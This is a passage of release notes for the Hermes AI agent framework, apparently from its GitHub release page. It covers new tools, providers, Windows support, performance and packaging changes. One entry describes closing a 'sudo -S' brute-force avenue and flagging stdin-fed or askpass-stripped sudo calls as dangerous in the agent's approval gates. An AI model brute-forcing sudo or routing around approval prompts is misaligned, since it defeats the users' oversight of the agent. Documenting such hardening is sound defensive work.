<p><strong>LSP semantic diagnostics on every write</strong> — <code>write_file</code> and <code>patch</code> now run real language-server diagnostics on the post-edit file (delta-only) and surface real errors before they ship downstream. (<a href="https://github.com/NousResearch/hermes-agent/pull/24168" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/24168/hovercard">#24168</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/25978" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/25978/hovercard">#25978</a>)</p>
</li>
<li>
<p><strong>Per-turn file-mutation verifier footer</strong> — after every turn that wrote files, the agent gets a verifier footer summarizing what actually changed on disk — catches silent overwrites and "wrote it but it didn't land" bugs. (<a href="https://github.com/NousResearch/hermes-agent/pull/24498" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/24498/hovercard">#24498</a>)</p>
</li>
<li>
<p><strong>Unified <code>video_generate</code> with pluggable provider backends</strong> — single tool, any backend. Drop in a new video provider as a plugin, no core changes. (<a href="https://github.com/NousResearch/hermes-agent/pull/25126" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/25126/hovercard">#25126</a>)</p>
</li>
<li>
<p><strong><code>computer_use</code> cua-driver backend</strong> — proper focus-safe ops, non-Anthropic provider support, refresh on <code>hermes update</code>. Computer-use is no longer locked to a single SDK. (re-salvage of <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341933760" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/16936" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16936/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/16936">#16936</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/21967" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/21967/hovercard">#21967</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/24063" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/24063/hovercard">#24063</a>)</p>
</li>
<li>
<p><strong>xAI Grok OAuth provider — SuperGrok via subscription</strong> — sign in with your xAI account, talk to Grok models from Hermes. (<a href="https://github.com/NousResearch/hermes-agent/pull/26534" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/26534/hovercard">#26534</a>)</p>
</li>
<li>
<p><strong>Clarify with buttons — native inline keyboards on Telegram + Discord</strong> — the <code>clarify</code> tool renders multi-choice prompts as platform-native buttons instead of typed responses. (<a href="https://github.com/NousResearch/hermes-agent/pull/24199" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/24199/hovercard">#24199</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/25485" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/25485/hovercard">#25485</a>)</p>
</li>
<li>
<p><strong>Discord channel history backfill (default on)</strong> — Hermes reads recent channel history when joining a thread so it actually knows what's been said. (<a href="https://github.com/NousResearch/hermes-agent/pull/25984" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/25984/hovercard">#25984</a>)</p>
</li>
<li>
<p><strong>Watchers skill — RSS / HTTP JSON / GitHub polling via cron <code>no_agent</code> mode</strong> — skill recipes that wire change-detection sources directly into cron's script-only watchdog mode. (<a href="https://github.com/NousResearch/hermes-agent/pull/21881" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/21881/hovercard">#21881</a>)</p>
</li>
<li>
<p><strong>Zed ACP Registry integration + uvx distribution</strong> — Hermes is in the Zed registry, installable via <code>uvx</code> (no npm). Plus <code>hermes acp --setup-browser</code> bootstraps browser tools for registry installs. (salvage of <a href="https://github.com/NousResearch/hermes-agent/pull/25908" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/25908/hovercard">#25908</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/26079" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/26079/hovercard">#26079</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/26120" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/26120/hovercard">#26120</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/26234" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/26234/hovercard">#26234</a>)</p>
</li>
<li>
<p><strong>OpenRouter Pareto Code router</strong> — wire a new OpenRouter router with <code>min_coding_score</code> knob. Pick the cheapest model that meets your quality bar. (<a href="https://github.com/NousResearch/hermes-agent/pull/22838" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22838/hovercard">#22838</a>)</p>
</li>
<li>
<p><strong>Optional codex app-server runtime for OpenAI/Codex models</strong> — drives the OpenAI Codex CLI under the hood for OpenAI/Codex paths, with session reuse, wedge retirement, and OAuth refresh classification. (<a href="https://github.com/NousResearch/hermes-agent/pull/24182" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/24182/hovercard">#24182</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/25769" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/25769/hovercard">#25769</a>)</p>
</li>
<li>
<p><strong><code>hermes-skills/huggingface</code> as a trusted default tap</strong> — community skills index from huggingface.co/skills is available by default in the Skills Hub. (<a href="https://github.com/NousResearch/hermes-agent/pull/26219" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/26219/hovercard">#26219</a>)</p>
</li>
<li>
<p><strong>9 new optional skills</strong> — Hyperliquid (perp/spot trading via SDK + REST) (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a> &amp; Hermes), Yahoo Finance market data, api-testing (REST/GraphQL debug), unified EVM multi-chain skill (folds <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4441931751" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/25291" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/25291/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/25291">#25291</a> + <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4098909401" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/2010" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/2010/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/2010">#2010</a> + base/), darwinian-evolver, osint-investigation (closes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4020048213" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/355" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/355/hovercard" href="https://github.com/NousResearch/hermes-agent/issues/355">#355</a>), pinggy-tunnel, watchers (RSS/HTTP/GitHub via cron), Notion overhaul for the Developer Platform (May 2026). (<a href="https://github.com/NousResearch/hermes-agent/pull/23582" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/23582/hovercard">#23582</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/23583" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/23583/hovercard">#23583</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/23590" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/23590/hovercard">#23590</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/25299" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/25299/hovercard">#25299</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/26760" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/26760/hovercard">#26760</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/26729" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/26729/hovercard">#26729</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/26765" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/26765/hovercard">#26765</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/21881" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/21881/hovercard">#21881</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/26612" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/26612/hovercard">#26612</a>)</p>
</li>
<li>
<p><strong>API server exposes run approval events</strong> — long-running runs surface approval requests over the API stream, no more silent stalls. (salvage of <a href="https://github.com/NousResearch/hermes-agent/pull/20311" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/20311/hovercard">#20311</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/21899" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/21899/hovercard">#21899</a>)</p>
</li>
<li>
<p><strong><code>/subgoal</code> — user-added criteria appended to active <code>/goal</code></strong> — layer extra success criteria onto a running goal loop. The judge sees them in the prompt, no behavior change when subgoals are empty. (<a href="https://github.com/NousResearch/hermes-agent/pull/25449" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/25449/hovercard">#25449</a>)</p>
</li>
<li>
<p><strong>Plugins can run any LLM call via <code>ctx.llm</code></strong> — plugins get a first-class hook to make their own LLM requests through the active provider/credentials, no manual wiring. Plus <code>tool_override</code> flag for replacing built-in tools. (<a href="https://github.com/NousResearch/hermes-agent/pull/23194" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/23194/hovercard">#23194</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/26759" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/26759/hovercard">#26759</a>)</p>
</li>
<li>
<p><strong>Brave Search (free tier) + DuckDuckGo (DDGS) as web-search providers</strong> — two new free search backends alongside Tavily / SearXNG / Exa. (<a href="https://github.com/NousResearch/hermes-agent/pull/21337" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/21337/hovercard">#21337</a>)</p>
</li>
<li>
<p><strong>Sudo brute-force block + sudo-stdin/askpass DANGEROUS classification</strong> — closes the <code>sudo -S</code> brute-force avenue; approval gates classify stdin-fed and askpass-stripped sudo invocations as dangerous. (salvages of <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4410605303" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/22194" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22194/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/22194">#22194</a> + <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4397828876" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/21128" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/21128/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/21128">#21128</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/23736" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/23736/hovercard">#23736</a>)</p>
</li>
<li>
<p><strong>Provider rename — Alibaba Cloud → Qwen Cloud, picker reorder</strong> — matches what the world calls it. Existing config keys still work. (<a href="https://github.com/NousResearch/hermes-agent/pull/24835" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/24835/hovercard">#24835</a>)</p>
</li>
</ul>
<hr>
<h2>🪟 Windows — Native Support (Early Beta)</h2>
<h3>Bootstrap &amp; installer</h3>
<ul>
<li><strong>Native Windows support (early beta)</strong> — first-class native Windows path across CLI / gateway / TUI / tools (<a href="https://github.com/NousResearch/hermes-agent/pull/21561" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/21561/hovercard">#21561</a>)</li>
<li><strong>PyPI wheel packaging — <code>pip install hermes-agent &amp;&amp; hermes</code></strong> (salvage of <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4454164335" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/26350" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/26350/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/26350">#26350</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/26593" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/26593/hovercard">#26593</a>)</li>
<li><strong>Recognise Shift+Enter as a newline key</strong> + Windows docs (salvage <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4402428863" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/21545" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/21545/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/21545">#21545</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/22130" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22130/hovercard">#22130</a>)</li>
<li><strong>Preserve Ctrl+C for Windows foreground runs</strong> (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/helix4u/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/helix4u">@helix4u</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/22752" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22752/hovercard">#22752</a>)</li>
<li><strong>Stop spamming cwd-missing + tirith-spawn warnings on every terminal call</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/26618" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/26618/hovercard">#26618</a>)</li>
<li><strong>Use <code>--extra all</code> not <code>--all-extras</code>; drop lazy-covered extras from <code>[all]</code></strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/24515" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/24515/hovercard">#24515</a>)</li>
</ul>
<h3>Windows-specific fixes (40+ across cli / tools / gateway / curator / TUI)</h3>
<p>A long tail of native-Windows fixes shipped alongside the beta — taskkill-based subprocess management, MinGit auto-install, Microsoft Store python stub detection, npm prefix handling, native PTY paths, signal handling differences, foreground process management, ANSI sequence handling, path normalization, file-locking semantics, and many more. Full list in commit log under <code>fix(windows)</code> / <code>feat(windows)</code> / <code>windows</code>.</p>
<hr>
<h2>🚀 Performance Wave</h2>
<h3>Cold start</h3>
<ul>
<li><strong>Cut ~19s from <code>hermes</code> cold start</strong> — skills cache + lazy Feishu + no Nous HTTP at startup (<a href="https://github.com/NousResearch/hermes-agent/pull/22138" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22138/hovercard">#22138</a>)</li>
<li><strong>Skip eager plugin discovery on known built-in subcommands</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/22120" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22120/hovercard">#22120</a>)</li>
<li><strong>Cache Nous auth + .env loads</strong> — <code>hermes tools</code> All Platforms from 14s to &lt;1.5s (<a href="https://github.com/NousResearch/hermes-agent/pull/25341" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/25341/hovercard">#25341</a>)</li>
<li><strong>Skip welcome banner on <code>chat -q</code> single-query mode</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/22904" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22904/hovercard">#22904</a>)</li>
<li><strong>Defer heavy google-cloud imports in google_chat to first adapter use</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/22681" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22681/hovercard">#22681</a>)</li>
<li><strong>Defer QQAdapter and YuanbaoAdapter imports via PEP 562</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/22790" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22790/hovercard">#22790</a>)</li>
<li><strong>Defer httpx import in teams to first webhook call</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/22831" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22831/hovercard">#22831</a>)</li>
<li><strong>Defer fal_client import to first generation request</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/22859" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22859/hovercard">#22859</a>)</li>
<li><strong>models.dev cache-first lookup, skip network when disk cache is fresh</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/22808" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22808/hovercard">#22808</a>)</li>
<li><strong>Parallelize API connectivity checks in <code>hermes doctor</code> and disable IMDS</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/22766" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22766/hovercard">#22766</a>)</li>
</ul>
<h3>Runtime</h3>
<ul>
<li><strong>180x faster <code>browser_console</code> evaluations</strong> — route through supervisor's persistent CDP WebSocket (<a href="https://github.com/NousResearch/hermes-agent/pull/23226" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/23226/hovercard">#23226</a>)</li>
<li><strong>Tune Telegram cadence + adaptive fast-path for short replies</strong> (salvage of <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4269831381" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/10388" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/10388/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/10388">#10388</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/23587" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/23587/hovercard">#23587</a>)</li>
<li><strong>Accumulate length-continuation prefix via list+join</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/26237" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/26237/hovercard">#26237</a>)</li>
</ul>
<h3>Prompt caching</h3>
<ul>
<li><strong>Cross-session 1h prefix cache for Claude on Anthropic / OpenRouter / Nous Portal</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/23828" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/23828/hovercard">#23828</a>)</li>
<li><strong>Hit prefix cache in background review fork</strong> (salvage <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348034723" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/17276" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17276/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/17276">#17276</a> + <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4443288876" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/25427" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/25427/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/25427">#25427</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/25434" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/25434/hovercard">#25434</a>)</li>
</ul>
<hr>
<h2>📦 Installation &amp; Distribution</h2>
<h3>PyPI + supply-chain</h3>
<ul>
<li><strong>PyPI wheel packaging — <code>pip install hermes-agent &amp;&amp; hermes</code></strong> (salvage of <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4454164335" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/26350" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/26350/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/26350">#26350</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/26593" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/26593/hovercard">#26593</a>)</li>
<li><strong>Supply-chain advisory checker + lazy-install framework + tiered install fallback</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/24220" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/24220/hovercard">#24220</a>)</li>
<li><strong>Use <code>--extra all</code> not <code>--all-extras</code>; drop lazy-covered extras from <code>[all]</code></strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/24515" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/24515/hovercard">#24515</a>)</li>
<li><strong>Skip browser download when system chromium exists</strong> (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/helix4u/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/helix4u">@helix4u</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/25317" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/25317/hovercard">#25317</a>)</li>
</ul>
<h3>Nix</h3>
<ul>
<li><strong><code>extraDependencyGroups</code> for sealed venv extras</strong> (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alt-glitch/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alt-glitch">@alt-glitch</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/21817" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/21817/hovercard">#21817</a>)</li>
<li><strong>Refresh npm lockfile hashes</strong> — keeps Nix flake builds reproducible</li>
</ul>
<h3>Docker</h3>
<ul>
<li><strong>Bootstrap auth.json from env on first boot</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/21880" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/21880/hovercard">#21880</a>)</li>
<li><strong>Drop manual @hermes/ink build, rely on esbuild bundle</strong> — slimmer image</li>
</ul>
<h3>ACP / Zed</h3>
<ul>
<li><strong>Zed ACP Registry integration</strong> (salvage of <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4448778934" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/25908" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/25908/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/25908">#25908</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/26079" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/26079/hovercard">#26079</a>)</li>
<li><strong>Switch to uvx distribution, drop npm launcher</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/26120" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/26120/hovercard">#26120</a>)</li>
<li><strong><code>hermes acp --setup-browser</code> bootstraps browser tools for registry installs</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/26234" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/26234/hovercard">#26234</a>)</li>
</ul>
<hr>
<h2>🏗️ Core Agent &amp; Architecture</h2>
<h3>Sessions &amp; handoff</h3>
<ul>
<li><strong><code>/handoff</code> actually transfers the session live</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/23395" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/23395/hovercard">#23395</a>)</li>
<li><strong>Expose <code>HERMES_SESSION_ID</code> env var to agent tools</strong> (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alt-glitch/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alt-glitch">@alt-glitch</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/23847" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/23847/hovercard">#23847</a>)</li>
</ul>
<h3>Goals (Ralph loop)</h3>
<ul>
<li><strong><code>/subgoal</code> — user-added criteria appended to active <code>/goal</code></strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/25449" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/25449/hovercard">#25449</a>)</li>
<li><strong><code>/goal</code> checklist + /subgoal user controls</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/23456" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/23456/hovercard">#23456</a>) — rolled back in window (<a href="https://github.com/NousResearch/hermes-agent/pull/23813" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/23813/hovercard">#23813</a>); /subgoal returned in simpler form via <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4443429014" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/25449" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/25449/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/25449">#25449</a></li>
</ul>
<h3>Compression</h3>
<ul>
<li><strong>Make <code>protect_first_n</code> configurable</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/25447" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/25447/hovercard">#25447</a>)</li>
</ul>
<h3>Verification</h3>
<ul>
<li><strong>Per-turn file-mutation verifier footer</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/24498" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/24498/hovercard">#24498</a>)</li>
</ul>
<h3>Stream retry</h3>
<ul>
<li><strong>Log inner cause, upstream headers, bytes/elapsed on every drop</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/23005" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/23005/hovercard">#23005</a>)</li>
</ul>
<hr>
<h2>🤖 Models &amp; Providers</h2>
<h3>New providers</h3>
<ul>
<li><strong>xAI Grok OAuth (SuperGrok Subscription) provider</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/26534" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/26534/hovercard">#26534</a>)</li>
<li><strong>NovitaAI provider</strong> (salvage <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4239769574" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/7219" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7219/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/7219">#7219</a>) (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/25507" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/25507/hovercard">#25507</a>)</li>
<li><strong>NVIDIA NIM billing origin header</strong> (salvage <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4440730370" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/25211" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/25211/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/25211">#25211</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/26585" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/26585/hovercard">#26585</a>)</li>
</ul>
<h3>Provider work</h3>
<ul>
<li><strong>OpenRouter Pareto Code router with <code>min_coding_score</code> knob</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/22838" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22838/hovercard">#22838</a>)</li>
<li><strong>Optional codex app-server runtime for OpenAI/Codex models</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/24182" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/24182/hovercard">#24182</a>)</li>
<li><strong>Codex-runtime: retire wedged sessions + post-tool watchdog + OAuth refresh classify</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/25769" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/25769/hovercard">#25769</a>)</li>
<li><strong>Codex-runtime: skip unavailable plugins during migration</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/25437" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/25437/hovercard">#25437</a>)</li>
<li><strong>Codex-runtime: de-dup <code>[plugins.X]</code> tables and stop leaking HERMES_HOME into config.toml</strong> (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4452637433" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/26250" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/26250/hovercard" href="https://github.com/NousResearch/hermes-agent/issues/26250">#26250</a>) (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/26260" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/26260/hovercard">#26260</a>)</li>
<li><strong>Pass <code>reasoning.effort</code> to xAI Responses API</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/22807" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22807/hovercard">#22807</a>)</li>
